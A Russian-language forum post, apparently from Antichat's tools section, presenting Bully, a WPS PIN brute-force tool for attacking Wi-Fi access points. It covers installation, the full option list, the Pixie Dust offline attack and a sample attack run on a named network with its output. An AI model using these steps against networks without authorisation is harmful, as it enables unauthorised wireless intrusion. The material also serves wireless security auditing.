ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Инструменты (https://forum.antichat.xyz/forumdisplay.php?f=176)
-   -   Bully — расширенный аналог Reaver (https://forum.antichat.xyz/showthread.php?t=1625577)

BKeaton 07.11.2018 17:44

Bully — это новое воплощение WPS атаки методом перебора паролей, расширенный и дополненный аналог Reaver. Программа написана на языке C и концептуально идентична другим программам в использовании ошибок проектирования спецификации WPS. По сравнению с оригинальным кодом аналогичных программ, данная программа имеет несколько преимуществ, таких как:

катагенез зависимостей;
улучшение памяти и времени работы центрального процессора;
правильная обработка порядка следования байтов и более функциональный набор опций.

Программа работает на Linux, и была специально создана для использования на встроенных системах Linux (OpenWrt, и т.д.) без привязки к архитектуре. Bully обеспечивает ряд усовершенствований в обнаружении и обработке аномальных сценариев. Она была успешно протестирована на точках доступа многих производителей, а также с различными конфигурациями.

У вас должна быть уже установлена программа Wiire’s Pixiewps.Последнюю версию можно найти здесь.
Технические требования

Код:

apt-get -y
вызовет установку дополнительных пакетов и библиотек build-essential libpcap-dev libssl-dev aircrack-ng pixiewps

Установка Bully
Скачайте

Код:

git clone https://github.com/aanarchyy/bully
или

Код:

wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
Настройте

Код:

cd bully*/
cd src/
make

Установите

Код:

sudo make install
Использование bully

Код:

root@kali:~# bully -h
bully  интерфейс

Необходимые параметры:
Интерфейс : Беспроводной интерфейс в режиме монитора (требуется root)

Код:

-b, --bssid macaddr    : MAC адрес целевой точки доступа
Or

Код:

-e, --essid string    : Расширенный SSID для точки доступа
Дополнительные параметры:

Код:

-c, --channel N[,N...] : Номер канала AP, или список единиц измерения            [b/g]
      -i, --index N          : Начальный индекс пина (7 или 8 символов)              [Auto]
      -l, --lockwait N      : Секунд для ожидания если AP заблокирован WPS            [43]
      -o, --outfile file    : Файл для вывода сообщений                            [stdout]
      -p, --pin N            : Начальный номер пина (7 или 8 символов)                [Auto]
      -s, --source macaddr  : Исходный (железный) MAC адрес                        [Probe]
      -v, --verbosity N      : Уровень вербальности 1-4, 1 – самый тихий                [3]
      -w, --workdir path    : Расположение файлов пина/сессии                  [~/.bully/]
      -5, --5ghz            : Список каналов по умолчанию для прыжков 5GHz a/n        [No]
      -B, --bruteforce      : Контрольная сумма пинов WPS для подбора пароля          [No]
      -F, --force            : Принудительно продолжать несмотря на предупреждения      [No]
      -S, --sequential      : Последовательные пины (не рандомизировать)              [No]
      -T, --test            : Режим тестирования (не вводить какие-либо пакеты)        [No]

Продвинутые параметры:

Код:

-d, --pixiewps        : Попытка использования pixiewps                          [No]
      -a, --acktime N        : Устаревшая/игнорируемая                                [Auto]
      -r, --retries N        : Повторная отправка пакетов N раз, когда нет подтверждения [2]
      -m, --m13time N        : Устаревшая/игнорируемая                                [Auto]
      -t, --timeout N        : Устаревшая/игнорируемая                                [Auto]
      -1, --pin1delay M,N    : Задержка M секунд каждое N не подтверждение в M5        [0,1]
      -2, --pin2delay M,N    : Задержка M секунд каждое N не подтверждение в M7        [5,1]
      -A, --noacks          : Отключить проверку ACK для отправляемых пакетов          [No]
      -C, --nocheck          : Пропустить валидацию CRC/FCS (производительность)        [No]
      -D, --detectlock      : Выявить WPS блокировки, о которых не сообщает AP        [No]
      -E, --eapfail          : EAP Failure после каждой отправки                        [No]
      -L, --lockignore      : Игнорировать WPS блокировки, о которых сообщает AP      [No]
      -M, --m57nack          : M5/M7 тайм аут рассматриваемый как WSC_NACK's            [No]
      -N, --nofcs            : Пакеты не содержат поле FCS                            [Auto]
      -P, --probe            : Использовать запросы зондирования для AP                [No]
      -R, --radiotap        : Предположительно, что заголовки radio tap присутствуют [Auto]
      -W, --windows7        : Делать вид, что регистрируется Windows 7                [No]
      -Z, --suppress        : Подавлять алгоритм тротинга пакетов                      [No]
      -V, --version          : Напечатать версию и выйти
      -h, --help            : Напечатать эту справку

Код:

-d // —pixiewps
Опция -d выполняет автономную атаку, Pixie Dust (pixiewps), автоматически передавая PKE, PKR, E-Hash1, E-Hash2, E-Nonce и Authkey, pixiewps будет пытаться атаковать Ralink, Broadcom и Realtek чипсеты.

Код:

-v // — verbosity
Опция –v определяет вербальность bully. – v 4 печатает все собранные хэши и выводит команду запустить pixiewps. По умолчанию уровень запуска 3.

Пример использования Bully
Атака беспроводной сети ESSID (-е 6F36E6) с использованием интерфейса режима монитора (mon0) :

Код:

root@kali:~# bully -e 6F36E6 mon0
[!]  Bully v1.0-22 - оценка уязвимости WPS
[X]  Неизвестная частота '-113135872' сообщает интерфейсу 'mon0'
[!]  Использование '00:1f:33:f3:51:13' для источника MAC - адресов
[+]  Datalink тип установлен в '127 ', показывает заголовки
[+]  Опрашиваем '6F36E6' на канале 'неизвестно'
[+]  Получил ответ для '6F36E6' (9c:d3:6d:b8:ff:56)
[+]  Переключение интерфейса 'mon0' для канала '8'
[!]  Информационный элемент указывает, что WPS заблокирован
[!]  Создание нового рандомизированного pin - файла '/root/.bully/pins'
[+]  Индекс исходного pin '0000000'
[+]  Последний статус = 'NoAssoc'  Следующий pin '54744431'

При подготовке материала использована информация aanarchyy/bully и Bully


Время: 15:43